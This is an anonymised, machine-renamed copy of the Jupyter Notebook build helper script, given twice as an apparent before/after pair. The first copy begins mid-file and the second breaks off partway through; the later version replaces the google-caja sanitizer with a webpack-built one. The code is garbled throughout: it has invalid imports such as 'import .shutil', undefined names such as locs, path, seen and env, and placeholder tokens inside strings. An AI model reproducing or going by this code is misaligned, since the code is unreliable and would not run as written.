def FUNC_18(VAR_41, VAR_42, VAR_43=None):
VAR_43 = locs or VAR_42
exec(compile(open(VAR_41).read(), VAR_41, "exec"), VAR_42, VAR_43)
VAR_5 = 'notebook'
VAR_6 = {}
FUNC_18(VAR_1(VAR_2, VAR_5, '_version.py'), VAR_6)
VAR_7 = VAR_6['__version__']
VAR_8 = re.compile(r'^([1-9]\d*!)?(0|[1-9]\d*)(\.(0|[1-9]\d*))*((a|b|rc)(0|[1-9]\d*))?(\.post(0|[1-9]\d*))?(\.dev(0|[1-9]\d*)?)?$')
if not VAR_8.match(VAR_7):
raise ValueError('Invalid VAR_7 number `%VAR_4`, please follow pep440 convention or pip will get confused about FUNC_19 VAR_44 is more recent.' % VAR_7)
def FUNC_1():
VAR_20 = []
for dir,subdirs,VAR_65 in os.walk(VAR_5):
VAR_44 = dir.replace(os.path.sep, '.')
if '__init__.py' not in VAR_65:
continue
VAR_20.append(VAR_44)
return VAR_20
def FUNC_2():
VAR_21 = [
VAR_1('static', 'components'),
VAR_1('static', '*', 'less'),
VAR_1('static', '*', 'node_modules')
]
VAR_22 = os.getcwd()
os.chdir('notebook')
VAR_23 = []
for parent, VAR_54, VAR_65 in os.walk('static'):
if any(fnmatch(parent, pat) for pat in VAR_21):
VAR_54[:] = []
continue
for f in VAR_65:
VAR_23.append(VAR_1(parent, f))
for app in ['auth', 'edit', 'notebook', 'terminal', 'tree']:
VAR_23.append(VAR_1('static', app, 'js', 'main.min.js'))
VAR_24 = VAR_1("static", "components")
VAR_23.extend([
VAR_1(VAR_24, "backbone", "backbone-min.js"),
VAR_1(VAR_24, "bootstrap", "dist", "js", "bootstrap.min.js"),
VAR_1(VAR_24, "bootstrap-tour", "build", "css", "bootstrap-tour.min.css"),
VAR_1(VAR_24, "bootstrap-tour", "build", "js", "bootstrap-tour.min.js"),
VAR_1(VAR_24, "create-react-class", "index.js"),
VAR_1(VAR_24, "font-awesome", "css", "*.css"),
VAR_1(VAR_24, "es6-promise", "*.js"),
VAR_1(VAR_24, "font-awesome", "fonts", "*.*"),
VAR_1(VAR_24, "google-caja", "html-VAR_62-sanitizer-minified.js"),
VAR_1(VAR_24, "jed", "jed.js"),
VAR_1(VAR_24, "jquery", "jquery.min.js"),
VAR_1(VAR_24, "jquery-typeahead", "dist", "jquery.typeahead.min.js"),
VAR_1(VAR_24, "jquery-typeahead", "dist", "jquery.typeahead.min.css"),
VAR_1(VAR_24, "jquery-ui", "jquery-ui.min.js"),
VAR_1(VAR_24, "jquery-ui", "themes", "smoothness", "jquery-ui.min.css"),
VAR_1(VAR_24, "jquery-ui", "themes", "smoothness", "images", "*"),
VAR_1(VAR_24, "marked", "lib", "marked.js"),
VAR_1(VAR_24, "react", "react.production.min.js"),
VAR_1(VAR_24, "react", "react-dom.production.min.js"),
VAR_1(VAR_24, "requirejs", "require.js"),
VAR_1(VAR_24, "requirejs-plugins", "src", "json.js"),
VAR_1(VAR_24, "requirejs-text", "text.js"),
VAR_1(VAR_24, "underscore", "underscore-min.js"),
VAR_1(VAR_24, "moment", "moment.js"),
VAR_1(VAR_24, "moment", "min", "*.js"),
VAR_1(VAR_24, "xterm.js", "index.js"),
VAR_1(VAR_24, "xterm.js-css", "index.css"),
VAR_1(VAR_24, "xterm.js-fit", "index.js"),
VAR_1(VAR_24, "text-encoding", "lib", "encoding.js"),
])
for parent, VAR_54, VAR_65 in os.walk(VAR_1(VAR_24, 'codemirror')):
for f in VAR_65:
if f.endswith(('.js', '.css')):
VAR_23.append(VAR_1(parent, f))
VAR_25 = lambda *VAR_14: VAR_1(VAR_24, 'MathJax', *VAR_14)
VAR_23.extend([
VAR_25('MathJax.js'),
VAR_25('config', 'TeX-AMS-MML_HTMLorMML-full.js'),
VAR_25('config', 'Safe.js'),
])
VAR_26 = []
VAR_27 = VAR_25('jax', 'output')
if os.path.exists(VAR_27):
for output in os.listdir(VAR_27):
VAR_14 = VAR_1(VAR_27, output)
VAR_23.append(VAR_1(VAR_14, '*.js'))
VAR_55 = VAR_1(VAR_14, 'autoload')
if os.path.isdir(VAR_55):
VAR_26.append(VAR_55)
for tree in VAR_26 + [
VAR_25('localization'), # limit to en?
VAR_25('fonts', 'HTML-CSS', 'STIX-Web', 'woff'),
VAR_25('extensions'),
VAR_25('jax', 'input', 'TeX'),
VAR_25('jax', 'output', 'HTML-CSS', 'fonts', 'STIX-Web'),
VAR_25('jax', 'output', 'SVG', 'fonts', 'STIX-Web'),
VAR_25('jax', 'element', 'mml'),
]:
for parent, VAR_54, VAR_65 in os.walk(tree):
for f in VAR_65:
VAR_23.append(VAR_1(parent, f))
os.chdir(os.path.join('tests',))
VAR_28 = glob('*.js') + glob('*/*.js')
os.chdir(VAR_22)
VAR_9 = {
'notebook' : ['templates/*'] + VAR_23,
'notebook.tests' : VAR_28,
'notebook.bundler.tests': ['resources/*', 'resources/*/*', 'resources/*/*/.*'],
'notebook.services.api': ['api.yaml'],
'notebook.i18n': ['*/LC_MESSAGES/*.*'],
}
return VAR_9
def FUNC_3(VAR_9):
print("checking VAR_44 data")
for pkg, data in VAR_9.items():
VAR_45 = VAR_1(*pkg.split('.'))
for d in data:
VAR_14 = VAR_1(VAR_45, d)
if '*' in VAR_14:
assert len(glob(VAR_14)) > 0, "No VAR_65 match pattern %s" % VAR_14
else:
assert os.path.exists(VAR_14), "Missing VAR_44 data: %s" % VAR_14
def FUNC_4(VAR_10):
class CLASS_5(VAR_10):
def FUNC_7(self):
FUNC_3(self.package_data)
VAR_10.run(self)
return CLASS_5
def FUNC_5(VAR_11):
VAR_29 = VAR_11.get_command_obj('build_py')
VAR_11.package_data = FUNC_2()
VAR_29.finalize_options()
try:
from shutil import .which
except ImportError:
def FUNC_19(VAR_15, VAR_46=os.F_OK | os.X_OK, VAR_14=None):
def FUNC_20(VAR_56, VAR_46):
return (os.path.exists(VAR_56) and os.access(VAR_56, VAR_46)
and not os.path.isdir(VAR_56))
if os.path.dirname(VAR_15):
if FUNC_20(VAR_15, VAR_46):
return VAR_15
return None
if VAR_14 is None:
VAR_14 = os.environ.get("PATH", os.defpath)
if not VAR_14:
return None
VAR_14 = path.split(os.pathsep)
if sys.platform == "win32":
if not os.curdir in VAR_14:
path.insert(0, os.curdir)
VAR_64 = os.environ.get("PATHEXT", "").split(os.pathsep)
if any(VAR_15.lower().endswith(ext.lower()) for ext in VAR_64):
VAR_65 = [VAR_15]
else:
VAR_65 = [VAR_15 + ext for ext in VAR_64]
else:
VAR_65 = [VAR_15]
VAR_57 = set()
for dir in VAR_14:
VAR_66 = os.path.normcase(dir)
if not VAR_66 in VAR_57:
seen.add(VAR_66)
for thefile in VAR_65:
VAR_5 = os.path.join(dir, thefile)
if FUNC_20(VAR_5, VAR_46):
return VAR_5
return None
VAR_12 = VAR_1(VAR_2, 'notebook', 'static')
VAR_13 = os.pathsep.join([
VAR_1(VAR_2, 'node_modules', '.bin'),
os.environ.get("PATH", os.defpath),
])
def FUNC_6(VAR_14):
return os.stat(VAR_14).st_mtime
def FUNC_7(VAR_15, *VAR_16, **VAR_17):
log.info('> ' + FUNC_10(VAR_15))
VAR_17['shell'] = (sys.platform == 'win32')
return check_call(VAR_15, *VAR_16, **VAR_17)
class CLASS_0(Command):
VAR_30 = "compile the .po VAR_65 into .mo VAR_65, that contain the translations."
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
def FUNC_7(self):
VAR_47 = glob('notebook/i18n/??_??')
for p in VAR_47:
VAR_58 = p[-5:]
for component in ['notebook', 'nbui']:
FUNC_7(['pybabel', 'compile',
'-D', component,
'-f',
'-l', VAR_58,
'-i', VAR_1('notebook', 'i18n', VAR_58, 'LC_MESSAGES', component+'.po'),
'-o', VAR_1('notebook', 'i18n', VAR_58, 'LC_MESSAGES', component+'.mo')
])
class CLASS_1(Command):
VAR_30 = "fetch VAR_12 client-side VAR_24 with bower"
VAR_31 = [
('force', 'f', "force fetching of bower dependencies"),
]
def FUNC_11(self):
self.force = False
def FUNC_12(self):
self.force = bool(self.force)
VAR_32 = VAR_1(VAR_12, 'components')
VAR_33 = VAR_1(VAR_2, 'node_modules')
def FUNC_13(self):
if self.force:
return True
if not os.path.exists(self.bower_dir):
return True
return FUNC_6(self.bower_dir) < FUNC_6(VAR_1(VAR_2, 'bower.json'))
def FUNC_14(self):
if not FUNC_19('npm'):
print("npm unavailable", file=sys.stderr)
return False
if not os.path.exists(self.node_modules):
return True
return FUNC_6(self.node_modules) < FUNC_6(VAR_1(VAR_2, 'package.json'))
def FUNC_7(self):
if not self.should_run():
print("bower dependencies up to date")
return
if self.should_run_npm():
print("installing build dependencies with npm")
FUNC_7(['npm', 'install'], VAR_22=VAR_2)
os.utime(self.node_modules, None)
VAR_48 = os.environ.copy()
VAR_48['PATH'] = VAR_13
try:
FUNC_7(
['bower', 'install', '--allow-root', '--config.interactive=false'],
VAR_22=VAR_2,
VAR_48=env
)
except OSError as e:
print("Failed to FUNC_7 bower: %s" % e, file=sys.stderr)
print("You can install VAR_61 dependencies with `npm install`", file=sys.stderr)
raise
os.utime(self.bower_dir, None)
FUNC_5(self.distribution)
def FUNC_8():
VAR_34 = VAR_1(VAR_12, 'components', 'bootstrap', 'less', 'print.less')
with open(VAR_34) as f:
VAR_49 = f.readlines()
for ix, VAR_68 in enumerate(VAR_49):
if 'Black prints faster' in VAR_68:
break
else:
return # Already patched out, nothing to do.
VAR_35 = VAR_49.pop(ix)
print("Removed line", ix, "from bootstrap print.less:")
print("-", VAR_35)
print()
with open(VAR_34, 'w') as f:
f.writelines(VAR_49)
class CLASS_2(Command):
VAR_30 = "Recompile Notebook CSS"
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
VAR_36 = []
VAR_37 = []
for VAR_5 in ('ipython', 'style'):
VAR_36.append(VAR_1(VAR_12, 'style', '%VAR_4.less' % VAR_5))
VAR_37.append(VAR_1(VAR_12, 'style', '%VAR_4.min.css' % VAR_5))
def FUNC_7(self):
self.run_command('jsdeps')
VAR_48 = os.environ.copy()
VAR_48['PATH'] = VAR_13
FUNC_8()
for src, dst in zip(self.sources, self.targets):
try:
FUNC_7(['lessc',
'--source-map',
'--include-VAR_14=%s' % pipes.quote(VAR_12),
src,
dst,
], VAR_22=VAR_2, VAR_48=env)
except OSError as e:
print("Failed to build VAR_62: %s" % e, file=sys.stderr)
print("You can install VAR_61 dependencies with `npm install`", file=sys.stderr)
raise
FUNC_5(self.distribution)
class CLASS_3(Command):
VAR_30 = "Rebuild Notebook Javascript main.min.js files"
VAR_31 = [
('force', 'f', "force rebuilding VAR_61 targets"),
]
def FUNC_11(self):
self.force = False
def FUNC_12(self):
self.force = bool(self.force)
VAR_38 = ['notebook', 'tree', 'edit', 'terminal', 'auth']
VAR_37 = [ VAR_1(VAR_12, app, 'js', 'main.min.js') for app in VAR_38 ]
def VAR_36(self, VAR_5):
yield VAR_1(VAR_2, 'tools', 'build-main.js')
yield VAR_1(VAR_12, VAR_5, 'js', 'main.js')
for sec in [VAR_5, 'base', 'auth']:
for f in glob(VAR_1(VAR_12, sec, 'js', '*.js')):
if not f.endswith('.min.js'):
yield f
yield VAR_1(VAR_12, 'services', 'config.js')
if VAR_5 == 'notebook':
for f in glob(VAR_1(VAR_12, 'services', '*', '*.js')):
yield f
for parent, VAR_54, VAR_65 in os.walk(VAR_1(VAR_12, 'components')):
if os.path.basename(parent) == 'MathJax':
VAR_54[:] = []
continue
for f in VAR_65:
yield VAR_1(parent, f)
def FUNC_13(self, VAR_5, VAR_39):
if self.force or not os.path.exists(VAR_39):
return True
VAR_50 = FUNC_6(VAR_39)
for source in self.sources(VAR_5):
if FUNC_6(source) > VAR_50:
print(source, VAR_39)
return True
return False
def FUNC_16(self, VAR_5):
VAR_39 = VAR_1(VAR_12, VAR_5, 'js', 'main.min.js')
if not self.should_run(VAR_5, VAR_39):
log.info("%VAR_4 up to date" % VAR_39)
return
log.info("Rebuilding %s" % VAR_39)
FUNC_7(['node', 'tools/build-main.js', VAR_5])
def FUNC_17(self, VAR_40):
VAR_51 = VAR_40[-5:]
FUNC_7([
VAR_1('node_modules', '.bin', 'po2json'),
'-p', '-F',
'-f', 'jed1.x',
'-d', 'nbjs',
VAR_1('notebook', 'i18n', VAR_51, 'LC_MESSAGES', 'nbjs.po'),
VAR_1('notebook', 'i18n', VAR_51, 'LC_MESSAGES', 'nbjs.json'),
])
def FUNC_7(self):
self.run_command('jsdeps')
VAR_48 = os.environ.copy()
VAR_48['PATH'] = VAR_13
VAR_52 = ThreadPool()
VAR_52.map(self.build_main, self.apps)
VAR_52.map(self.build_jstranslation, glob('notebook/i18n/??_??'))
FUNC_5(self.distribution)
class CLASS_4(Command):
VAR_30 = "Write Jupyter VAR_7 to javascript"
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
def FUNC_7(self):
VAR_53 = VAR_1(VAR_2, "notebook", "static", "base", "js", "namespace.js")
with open(VAR_53) as f:
VAR_49 = f.readlines()
with open(VAR_53, 'w') as f:
VAR_59 = False
for VAR_68 in VAR_49:
if VAR_68.strip().startswith("Jupyter.version"):
VAR_68 = ' Jupyter.version = "{0}";\n'.format(VAR_7)
VAR_59 = True
f.write(VAR_68)
if not VAR_59:
raise RuntimeError("Didn't find Jupyter.version VAR_68 in %s" % VAR_53)
def FUNC_9(VAR_10, VAR_18=False):
class CLASS_5(VAR_10):
def FUNC_7(self):
self.distribution.run_command('jsversion')
VAR_60 = self.distribution.get_command_obj('jsdeps')
VAR_61 = self.distribution.get_command_obj('js')
VAR_62 = self.distribution.get_command_obj('css')
VAR_60.force = VAR_61.force = VAR_18
VAR_37 = [ VAR_60.bower_dir ]
VAR_37.extend(VAR_61.targets)
VAR_37.extend(VAR_62.targets)
VAR_63 = [ t for t in VAR_37 if not os.path.exists(t) ]
if not VAR_3 and not VAR_63:
VAR_10.run(self)
return
try:
self.distribution.run_command('js')
self.distribution.run_command('css')
self.distribution.run_command('backendtranslations')
except Exception as e:
VAR_63 = [ t for t in VAR_37 if not os.path.exists(t) ]
if VAR_18 or VAR_63:
VAR_67 = os.path.commonprefix([VAR_2 + os.sep] + VAR_63)
VAR_63 = [ m[len(VAR_67):] for m in VAR_63 ]
log.warn("rebuilding VAR_61 and VAR_62 failed. The following required VAR_65 are VAR_63: %s" % VAR_63)
raise e
else:
log.warn("rebuilding VAR_61 and VAR_62 failed (not a problem)")
log.warn(str(e))
VAR_63 = [ t for t in VAR_37 if not os.path.exists(t) ]
if VAR_63:
VAR_67 = os.path.commonprefix([VAR_2 + os.sep] + VAR_63)
VAR_63 = [ m[len(VAR_67):] for m in VAR_63 ]
raise ValueError("The following required VAR_65 are VAR_63: %s" % VAR_63)
VAR_10.run(self)
return CLASS_5
|
import os
import re
import pipes
import .shutil
import .sys
from distutils import log
from distutils.cmd import Command
from fnmatch import .fnmatch
from glob import glob
from multiprocessing.pool import ThreadPool
from subprocess import check_call
if sys.platform == 'win32':
from subprocess import .list2cmdline
else:
def FUNC_10(VAR_19):
return ' '.join(map(pipes.quote, VAR_19))
VAR_0 = os.path.isfile
VAR_1 = os.path.join
VAR_2 = os.path.dirname(os.path.abspath(__file__))
VAR_3 = os.path.isdir(VAR_1(VAR_2, '.git'))
def FUNC_0(VAR_4):
print(">", VAR_4)
os.system(VAR_4)
try:
FUNC_18
except NameError:
def FUNC_18(VAR_42, VAR_43, VAR_44=None):
VAR_44 = locs or VAR_43
exec(compile(open(VAR_42).read(), VAR_42, "exec"), VAR_43, VAR_44)
VAR_5 = 'notebook'
VAR_6 = {}
FUNC_18(VAR_1(VAR_2, VAR_5, '_version.py'), VAR_6)
VAR_7 = VAR_6['__version__']
VAR_8 = re.compile(r'^([1-9]\d*!)?(0|[1-9]\d*)(\.(0|[1-9]\d*))*((a|b|rc)(0|[1-9]\d*))?(\.post(0|[1-9]\d*))?(\.dev(0|[1-9]\d*)?)?$')
if not VAR_8.match(VAR_7):
raise ValueError('Invalid VAR_7 number `%VAR_4`, please follow pep440 convention or pip will get confused about FUNC_19 VAR_45 is more recent.' % VAR_7)
def FUNC_1():
VAR_20 = []
for dir,subdirs,VAR_67 in os.walk(VAR_5):
VAR_45 = dir.replace(os.path.sep, '.')
if '__init__.py' not in VAR_67:
continue
VAR_20.append(VAR_45)
return VAR_20
def FUNC_2():
VAR_21 = [
VAR_1('static', 'components'),
VAR_1('static', '*', 'less'),
VAR_1('static', '*', 'node_modules')
]
VAR_22 = os.getcwd()
os.chdir('notebook')
VAR_23 = []
for parent, VAR_56, VAR_67 in os.walk('static'):
if any(fnmatch(parent, pat) for pat in VAR_21):
VAR_56[:] = []
continue
for f in VAR_67:
VAR_23.append(VAR_1(parent, f))
for app in ['auth', 'edit', 'notebook', 'terminal', 'tree']:
VAR_23.append(VAR_1('static', app, 'js', 'main.min.js'))
VAR_24 = VAR_1("static", "components")
VAR_23.extend([
VAR_1(VAR_24, "backbone", "backbone-min.js"),
VAR_1(VAR_24, "bootstrap", "dist", "js", "bootstrap.min.js"),
VAR_1(VAR_24, "bootstrap-tour", "build", "css", "bootstrap-tour.min.css"),
VAR_1(VAR_24, "bootstrap-tour", "build", "js", "bootstrap-tour.min.js"),
VAR_1(VAR_24, "create-react-class", "index.js"),
VAR_1(VAR_24, "font-awesome", "css", "*.css"),
VAR_1(VAR_24, "es6-promise", "*.js"),
VAR_1(VAR_24, "font-awesome", "fonts", "*.*"),
VAR_1(VAR_24, "jed", "jed.js"),
VAR_1(VAR_24, "jquery", "jquery.min.js"),
VAR_1(VAR_24, "jquery-typeahead", "dist", "jquery.typeahead.min.js"),
VAR_1(VAR_24, "jquery-typeahead", "dist", "jquery.typeahead.min.css"),
VAR_1(VAR_24, "jquery-ui", "jquery-ui.min.js"),
VAR_1(VAR_24, "jquery-ui", "themes", "smoothness", "jquery-ui.min.css"),
VAR_1(VAR_24, "jquery-ui", "themes", "smoothness", "images", "*"),
VAR_1(VAR_24, "marked", "lib", "marked.js"),
VAR_1(VAR_24, "react", "react.production.min.js"),
VAR_1(VAR_24, "react", "react-dom.production.min.js"),
VAR_1(VAR_24, "requirejs", "require.js"),
VAR_1(VAR_24, "requirejs-plugins", "src", "json.js"),
VAR_1(VAR_24, "requirejs-text", "text.js"),
VAR_1(VAR_24, "sanitizer", "index.js"),
VAR_1(VAR_24, "underscore", "underscore-min.js"),
VAR_1(VAR_24, "moment", "moment.js"),
VAR_1(VAR_24, "moment", "min", "*.js"),
VAR_1(VAR_24, "xterm.js", "index.js"),
VAR_1(VAR_24, "xterm.js-css", "index.css"),
VAR_1(VAR_24, "xterm.js-fit", "index.js"),
VAR_1(VAR_24, "text-encoding", "lib", "encoding.js"),
])
for parent, VAR_56, VAR_67 in os.walk(VAR_1(VAR_24, 'codemirror')):
for f in VAR_67:
if f.endswith(('.js', '.css')):
VAR_23.append(VAR_1(parent, f))
VAR_25 = lambda *VAR_14: VAR_1(VAR_24, 'MathJax', *VAR_14)
VAR_23.extend([
VAR_25('MathJax.js'),
VAR_25('config', 'TeX-AMS-MML_HTMLorMML-full.js'),
VAR_25('config', 'Safe.js'),
])
VAR_26 = []
VAR_27 = VAR_25('jax', 'output')
if os.path.exists(VAR_27):
for output in os.listdir(VAR_27):
VAR_14 = VAR_1(VAR_27, output)
VAR_23.append(VAR_1(VAR_14, '*.js'))
VAR_57 = VAR_1(VAR_14, 'autoload')
if os.path.isdir(VAR_57):
VAR_26.append(VAR_57)
for tree in VAR_26 + [
VAR_25('localization'), # limit to en?
VAR_25('fonts', 'HTML-CSS', 'STIX-Web', 'woff'),
VAR_25('extensions'),
VAR_25('jax', 'input', 'TeX'),
VAR_25('jax', 'output', 'HTML-CSS', 'fonts', 'STIX-Web'),
VAR_25('jax', 'output', 'SVG', 'fonts', 'STIX-Web'),
VAR_25('jax', 'element', 'mml'),
]:
for parent, VAR_56, VAR_67 in os.walk(tree):
for f in VAR_67:
VAR_23.append(VAR_1(parent, f))
os.chdir(os.path.join('tests',))
VAR_28 = glob('*.js') + glob('*/*.js')
os.chdir(VAR_22)
VAR_9 = {
'notebook' : ['templates/*'] + VAR_23,
'notebook.tests' : VAR_28,
'notebook.bundler.tests': ['resources/*', 'resources/*/*', 'resources/*/*/.*'],
'notebook.services.api': ['api.yaml'],
'notebook.i18n': ['*/LC_MESSAGES/*.*'],
}
return VAR_9
def FUNC_3(VAR_9):
print("checking VAR_45 data")
for pkg, data in VAR_9.items():
VAR_46 = VAR_1(*pkg.split('.'))
for d in data:
VAR_14 = VAR_1(VAR_46, d)
if '*' in VAR_14:
assert len(glob(VAR_14)) > 0, "No VAR_67 match pattern %s" % VAR_14
else:
assert os.path.exists(VAR_14), "Missing VAR_45 data: %s" % VAR_14
def FUNC_4(VAR_10):
class CLASS_5(VAR_10):
def FUNC_7(self):
FUNC_3(self.package_data)
VAR_10.run(self)
return CLASS_5
def FUNC_5(VAR_11):
VAR_29 = VAR_11.get_command_obj('build_py')
VAR_11.package_data = FUNC_2()
VAR_29.finalize_options()
try:
from shutil import .which
except ImportError:
def FUNC_19(VAR_15, VAR_47=os.F_OK | os.X_OK, VAR_14=None):
def FUNC_20(VAR_58, VAR_47):
return (os.path.exists(VAR_58) and os.access(VAR_58, VAR_47)
and not os.path.isdir(VAR_58))
if os.path.dirname(VAR_15):
if FUNC_20(VAR_15, VAR_47):
return VAR_15
return None
if VAR_14 is None:
VAR_14 = os.environ.get("PATH", os.defpath)
if not VAR_14:
return None
VAR_14 = path.split(os.pathsep)
if sys.platform == "win32":
if not os.curdir in VAR_14:
path.insert(0, os.curdir)
VAR_66 = os.environ.get("PATHEXT", "").split(os.pathsep)
if any(VAR_15.lower().endswith(ext.lower()) for ext in VAR_66):
VAR_67 = [VAR_15]
else:
VAR_67 = [VAR_15 + ext for ext in VAR_66]
else:
VAR_67 = [VAR_15]
VAR_59 = set()
for dir in VAR_14:
VAR_68 = os.path.normcase(dir)
if not VAR_68 in VAR_59:
seen.add(VAR_68)
for thefile in VAR_67:
VAR_5 = os.path.join(dir, thefile)
if FUNC_20(VAR_5, VAR_47):
return VAR_5
return None
VAR_12 = VAR_1(VAR_2, 'notebook', 'static')
VAR_13 = os.pathsep.join([
VAR_1(VAR_2, 'node_modules', '.bin'),
os.environ.get("PATH", os.defpath),
])
def FUNC_6(VAR_14):
return os.stat(VAR_14).st_mtime
def FUNC_7(VAR_15, *VAR_16, **VAR_17):
log.info('> ' + FUNC_10(VAR_15))
VAR_17['shell'] = (sys.platform == 'win32')
return check_call(VAR_15, *VAR_16, **VAR_17)
class CLASS_0(Command):
VAR_30 = "compile the .po VAR_67 into .mo VAR_67, that contain the translations."
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
def FUNC_7(self):
VAR_48 = glob('notebook/i18n/??_??')
for p in VAR_48:
VAR_60 = p[-5:]
for component in ['notebook', 'nbui']:
FUNC_7(['pybabel', 'compile',
'-D', component,
'-f',
'-l', VAR_60,
'-i', VAR_1('notebook', 'i18n', VAR_60, 'LC_MESSAGES', component+'.po'),
'-o', VAR_1('notebook', 'i18n', VAR_60, 'LC_MESSAGES', component+'.mo')
])
class CLASS_1(Command):
VAR_30 = "fetch VAR_12 client-side VAR_24 with bower"
VAR_31 = [
('force', 'f', "force fetching of bower dependencies"),
]
def FUNC_11(self):
self.force = False
def FUNC_12(self):
self.force = bool(self.force)
VAR_32 = VAR_1(VAR_12, 'components')
VAR_33 = VAR_1(VAR_2, 'node_modules')
VAR_34 = VAR_1(VAR_32, 'sanitizer')
def FUNC_13(self):
if self.force:
return True
if not os.path.exists(self.bower_dir):
return True
if not os.path.exists(self.sanitizer_dir):
return True
VAR_49 = FUNC_6(self.bower_dir) < FUNC_6(VAR_1(VAR_2, 'bower.json'))
if VAR_49:
return True
return FUNC_6(self.sanitizer_dir) < FUNC_6(VAR_1(VAR_2, 'webpack.config.js'))
def FUNC_14(self):
if not FUNC_19('npm'):
print("npm unavailable", file=sys.stderr)
return False
if not os.path.exists(self.node_modules):
return True
return FUNC_6(self.node_modules) < FUNC_6(VAR_1(VAR_2, 'package.json'))
def FUNC_7(self):
if not self.should_run():
print("bower dependencies up to date")
return
if self.should_run_npm():
print("installing build dependencies with npm")
FUNC_7(['npm', 'install'], VAR_22=VAR_2)
os.utime(self.node_modules, None)
VAR_50 = os.environ.copy()
VAR_50['PATH'] = VAR_13
try:
FUNC_7(
['bower', 'install', '--allow-root', '--config.interactive=false'],
VAR_22=VAR_2,
VAR_50=env
)
except OSError as e:
print("Failed to FUNC_7 bower: %s" % e, file=sys.stderr)
print("You can install VAR_63 dependencies with `npm install`", file=sys.stderr)
raise
if not os.path.exists(self.sanitizer_dir):
FUNC_7(['npm', 'run', 'build:webpack'], VAR_22=VAR_2, VAR_50=env)
os.utime(self.bower_dir, None)
FUNC_5(self.distribution)
def FUNC_8():
VAR_35 = VAR_1(VAR_12, 'components', 'bootstrap', 'less', 'print.less')
with open(VAR_35) as f:
VAR_51 = f.readlines()
for ix, VAR_70 in enumerate(VAR_51):
if 'Black prints faster' in VAR_70:
break
else:
return # Already patched out, nothing to do.
VAR_36 = VAR_51.pop(ix)
print("Removed line", ix, "from bootstrap print.less:")
print("-", VAR_36)
print()
with open(VAR_35, 'w') as f:
f.writelines(VAR_51)
class CLASS_2(Command):
VAR_30 = "Recompile Notebook CSS"
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
VAR_37 = []
VAR_38 = []
for VAR_5 in ('ipython', 'style'):
VAR_37.append(VAR_1(VAR_12, 'style', '%VAR_4.less' % VAR_5))
VAR_38.append(VAR_1(VAR_12, 'style', '%VAR_4.min.css' % VAR_5))
def FUNC_7(self):
self.run_command('jsdeps')
VAR_50 = os.environ.copy()
VAR_50['PATH'] = VAR_13
FUNC_8()
for src, dst in zip(self.sources, self.targets):
try:
FUNC_7(['lessc',
'--source-map',
'--include-VAR_14=%s' % pipes.quote(VAR_12),
src,
dst,
], VAR_22=VAR_2, VAR_50=env)
except OSError as e:
print("Failed to build VAR_64: %s" % e, file=sys.stderr)
print("You can install VAR_63 dependencies with `npm install`", file=sys.stderr)
raise
FUNC_5(self.distribution)
class CLASS_3(Command):
VAR_30 = "Rebuild Notebook Javascript main.min.js files"
VAR_31 = [
('force', 'f', "force rebuilding VAR_63 targets"),
]
def FUNC_11(self):
self.force = False
def FUNC_12(self):
self.force = bool(self.force)
VAR_39 = ['notebook', 'tree', 'edit', 'terminal', 'auth']
VAR_38 = [ VAR_1(VAR_12, app, 'js', 'main.min.js') for app in VAR_39 ]
def VAR_37(self, VAR_5):
yield VAR_1(VAR_2, 'tools', 'build-main.js')
yield VAR_1(VAR_12, VAR_5, 'js', 'main.js')
for sec in [VAR_5, 'base', 'auth']:
for f in glob(VAR_1(VAR_12, sec, 'js', '*.js')):
if not f.endswith('.min.js'):
yield f
yield VAR_1(VAR_12, 'services', 'config.js')
if VAR_5 == 'notebook':
for f in glob(VAR_1(VAR_12, 'services', '*', '*.js')):
yield f
for parent, VAR_56, VAR_67 in os.walk(VAR_1(VAR_12, 'components')):
if os.path.basename(parent) == 'MathJax':
VAR_56[:] = []
continue
for f in VAR_67:
yield VAR_1(parent, f)
def FUNC_13(self, VAR_5, VAR_40):
if self.force or not os.path.exists(VAR_40):
return True
VAR_52 = FUNC_6(VAR_40)
for source in self.sources(VAR_5):
if FUNC_6(source) > VAR_52:
print(source, VAR_40)
return True
return False
def FUNC_16(self, VAR_5):
VAR_40 = VAR_1(VAR_12, VAR_5, 'js', 'main.min.js')
if not self.should_run(VAR_5, VAR_40):
log.info("%VAR_4 up to date" % VAR_40)
return
log.info("Rebuilding %s" % VAR_40)
FUNC_7(['node', 'tools/build-main.js', VAR_5])
def FUNC_17(self, VAR_41):
VAR_53 = VAR_41[-5:]
FUNC_7([
VAR_1('node_modules', '.bin', 'po2json'),
'-p', '-F',
'-f', 'jed1.x',
'-d', 'nbjs',
VAR_1('notebook', 'i18n', VAR_53, 'LC_MESSAGES', 'nbjs.po'),
VAR_1('notebook', 'i18n', VAR_53, 'LC_MESSAGES', 'nbjs.json'),
])
def FUNC_7(self):
self.run_command('jsdeps')
VAR_50 = os.environ.copy()
VAR_50['PATH'] = VAR_13
VAR_54 = ThreadPool()
VAR_54.map(self.build_main, self.apps)
VAR_54.map(self.build_jstranslation, glob('notebook/i18n/??_??'))
FUNC_5(self.distribution)
class CLASS_4(Command):
VAR_30 = "Write Jupyter VAR_7 to javascript"
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
def FUNC_7(self):
VAR_55 = VAR_1(VAR_2, "notebook", "static", "base", "js", "namespace.js")
with open(VAR_55) as f:
VAR_51 = f.readlines()
with open(VAR_55, 'w') as f:
VAR_61 = False
for VAR_70 in VAR_51:
if VAR_70.strip().startswith("Jupyter.version"):
VAR_70 = ' Jupyter.version = "{0}";\n'.format(VAR_7)
VAR_61 = True
f.write(VAR_70)
if not VAR_61:
raise RuntimeError("Didn't find Jupyter.version VAR_70 in %s" % VAR_55)
def FUNC_9(VAR_10, VAR_18=False):
class CLASS_5(VAR_10):
def FUNC_7(self):
self.distribution.run_command('jsversion')
VAR_62 = self.distribution.get_command_obj('jsdeps')
VAR_63 = self.distribution.get_command_obj('js')
VAR_64 = self.distribution.get_command_obj('css')
VAR_62.force = VAR_63.force = VAR_18
VAR_38 = [ VAR_62.bower_dir ]
VAR_38.extend(VAR_63.targets)
VAR_38.extend(VAR_64.targets)
VAR_65 = [ t for t in VAR_38 if not os.path.exists(t) ]
if not VAR_3 and not VAR_65:
VAR_10.run(self)
return
try:
self.distribution.run_command('js')
self.distribution.run_command('css')
self.distribution.run_command('backendtranslations')
except Exception as e:
